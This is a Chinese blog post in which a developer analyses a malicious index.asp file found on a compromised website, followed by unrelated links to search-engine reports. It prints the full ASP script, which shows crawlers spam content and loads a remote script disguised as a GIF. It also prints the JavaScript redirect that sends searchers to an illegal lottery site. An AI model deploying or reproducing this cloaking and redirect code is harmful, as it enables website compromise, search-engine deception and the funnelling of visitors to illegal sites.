`
callmeali
  • 浏览: 2138 次
  • 性别: Icon_minigender_1
  • 来自: 南宁
最近访客 更多访客>>
文章分类
社区版块
存档分类
最新评论

搜索引擎欺骗病毒的一些研究

阅读更多
   之前网站上有一个专题总是被百度收录成非法彩票信息,打开网页看正常,页面源代码也查找不到非法彩票的相关字眼,甚是奇怪,未果。今日领导又提及此事,便不知如何是好,只能硬着头皮彻头彻尾的仔细寻找,更新cdn,杀毒软件扫描也正常,正在绝望之际,发现目录下多了个脚本文件index.asp。暗喜,原来罪魁祸首在此。把它rename,在用搜索抓取模拟器测试,正常。

    下面兴趣之余,打开文件来研究。

<%
Function check(user_agent)
    allow_agent=split("Baiduspider,Googlebot",",")
    check_agent=false
    For agents=lbound(allow_agent) to ubound(allow_agent)
        If instr(user_agent,allow_agent(agents))>0 then
            check_agent=true
            exit for
        end if 
    Next
    check=check_agent
End function
canshu=Request.ServerVariables("query_string")
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
Refer=Request.ServerVariables("HTTP_REFERER")
If check(user_agent)=true then
%>
<!--#include file="../a_images/pic.jpg"-->
<%else%>
<%
Refer=Request.ServerVariables("HTTP_REFERER")
if Instr(Refer,"wd=%C1%F9%BA%CF%B2%CA")<>0 or Instr(Refer,"wd=%E5%85%AD%E5%90%88%E5%BD%A9")<>0 Then%>
<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>
<%
response.end
end if%>
<!--#include file="index.shtml"-->
<%end if%>




    因为本人是写java的,asp不太熟,而且只用过c#写asp,看上去又不像vb,不过从第一行就看得出它想做什么了。  allow_agent=split("Baiduspider,Googlebot",","),显然,是对搜索引擎做处理,不用猜也知道,他下面的脚本应该是要欺骗搜索引擎了。欺骗搜索引擎,他应该要转向一个他自己的病毒页面,应该有url地址才对,但是脚本竟然没有url地址出现过,迷茫。

    但是,有个极为可以的地方,<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>这个标签要加载一个js脚本,但是地址竟然是个gif图片?神奇。习惯上会把这个地址复制到浏览器上看看是啥玩意儿。失望,是一个红叉。

    以正常思路这个图片是不存在,但是谁又知道该地址背后隐藏的秘密?打开下载工具,把图片地址复制上去,保存为txt文件。不看不知道,一看吓一跳,打开文件竟然是熟悉的javascript脚本。如果不处处怀疑,做梦也不会想到这个不存在的图片就是关键所在。牛B。

    代码如下:

GIF89a="";
var d=document.referrer;
if ((d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){
if((window.location.href.indexOf("baotou")>0)||(window.location.href.indexOf("cnhubei")>0)){
window.location.href="http://www.58887888.net./";
}
else{
window.location.href="http://www.58887888.net./index2.htm";
}
}



    上面有两个url地址:ht tp://www.58887888.net./,ht tp://www.58887888.net./index2.htm,就是带非法彩票信息的页面了。不去研究又怎知道,原来我们看到的一个很正常的网页,在搜索引擎眼里竟然是一个非法彩票网页。欧麦嘎,这就是黑客,只要利用服务器的漏洞写入一个不到1kg的脚本文件,不仅把大家的肉眼欺骗了,连度娘和谷哥也蒙在鼓里,哈哈,是不是心动想做黑客了吧,心动不如行动。。。
分享到:
评论

相关推荐

    2008年中国搜索引擎市场广告主研究报告

    2008年中国搜索引擎市场广告主研究报告 2008年中国搜索引擎用户行为研究报告 2008年中国网民信息网络安全状况研究报告 四川省互联网络发展状况报告 (2008) 中国WAP发展状况调查报告 (2007) 中国互联网络热点调查报告...

    中文病毒搜索引擎

    特色: 1.用的是资源是江民推出的“全球中文病毒资料库及搜索引擎” 2.病毒资料库包含了各种各样的病毒查询,希望你能找到你想要的资料! 提示:此版本为完全免费版,所以,程序更新请到官方查询.

    2019年中国网民搜索引擎使用情况研究报告.pdf

    为更好地了解当前搜索引擎用户使用习惯和行业发展现状,CNNIC 于 2019 年 6 月开展了针对中国网民搜索引擎使用情况的专项调查,并撰写了《2019 年中国网民搜索引擎使用情况研究报告》。 本次报告对中国网民的搜索...

    搜索引擎-传统搜索引擎与智能搜索引擎比较研究.pdf

    搜索引擎-传统搜索引擎与智能搜索引擎比较研究.pdf

    搜索引擎中网络爬虫的研究

    搜索引擎中网络爬虫的研究 论文 武汉理工大学硕士学位论文 第1章引言 1.1选题背景 人类社会的发展离不开知识的获取与发现,进入互联网时代以后,信息出现 了飞速地增长,对于网络上不断涌现的各种信息,人们的接受...

    搜索引擎技术分析与研究

    搜索引擎技术分析与研究 互联网的发展,便得互联网上的信息急剧增加,越来越多的网络用户依赖搜索引擎从互联网上获得需要的信息

    综合搜索引擎与垂直搜索引擎的比较研究

    搜索引擎是目前互联网信息服务的主要工具, 它的竞争也日趋激烈, 搜索引擎的信息服 务也逐渐引起重视。本文从信息服务的角度出发, 通过对综合搜索引擎与垂直搜索引擎在信息服 务各个要素方面的比较, 找出它们之间的...

    搜索引擎质量评价研究

    搜索引擎质量评价研究搜索引擎质量评价研究搜索引擎质量评价研究搜索引擎质量评价研究

    基于Lucene的搜索引擎的研究与应用

    基于Lucene的搜索引擎的研究与应用基于Lucene的搜索引擎的研究与应用

    论文研究-基于中文搜索引擎网络信息用户行为研究.pdf

    然后从中英文用户的搜索行为差异的角度出发,对日志文件进行深入研究,包括各中文搜索引擎使用率比较以及中文用户输入查询行为的一些规律等。研究结果表明,对准确地评测搜索引擎检索的效果以及未来中文搜索引擎设计...

    搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述

    搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎概述搜索引擎...

    垂直搜索引擎网络爬虫的研究与实现.pdf

    垂直搜索引擎网络爬虫的研究与实现.pdf垂直搜索引擎网络爬虫的研究与实现.pdf垂直搜索引擎网络爬虫的研究与实现.pdf垂直搜索引擎网络爬虫的研究与实现.pdf

    网站搜索引擎优化考试答案

    不了解搜索引擎工作原理,也就无从替搜索引擎解决一些SEOer力所能及的技术问题。 (3)很多SEO技巧是基于对搜索引擎的理解,比如原创、标题、链接等。 叙述搜索引擎营销过程。 (1)用户搜索关键词寻找自己需要的...

    jsp搜索引擎的研究与实现毕业设计全套

    jsp搜索引擎的研究与实现毕业设计全套jsp搜索引擎的研究与实现毕业设计全套jsp搜索引擎的研究与实现毕业设计全套jsp搜索引擎的研究与实现毕业设计全套jsp搜索引擎的研究与实现毕业设计全套jsp搜索引擎的研究与实现...

    《搜索引擎营销实训》课程教学大纲.docx

    《搜索引擎营销实训》课程教学大纲.docx《搜索引擎营销实训》课程教学大纲.docx《搜索引擎营销实训》课程教学大纲.docx《搜索引擎营销实训》课程教学大纲.docx《搜索引擎营销实训》课程教学大纲.docx《搜索引擎营销...

    走进搜索引擎,利用搜索引擎进行数据分析

    《走进搜索引擎》由搜索引擎开发研究领域年轻而有活力的科学家精心编写,作者将自己对搜索引擎的深刻理解和实际应用巧妙地结合,使得从未接触过搜索引擎原理的读者也能够轻松地在搜索引擎的大厦中邀游一番。...

    搜索引擎聚合源码搜索引擎聚合源码

    搜索引擎聚合源码

    2009年中国搜索引擎用户行为研究报告

    2009年中国搜索引擎用户行为研究报告 CNNIC出品,很据权威性 有兴趣可以研究研究

    基于Lucene的全文搜索引擎研究与应用.pdf

    基于Lucene的全文搜索引擎研究与应用.pdf 详实的介绍Lucene的架构设计分析

    搜索引擎PageRank算法研究

    搜索引擎PageRank算法研究

Global site tag (gtag.js) - Google Analytics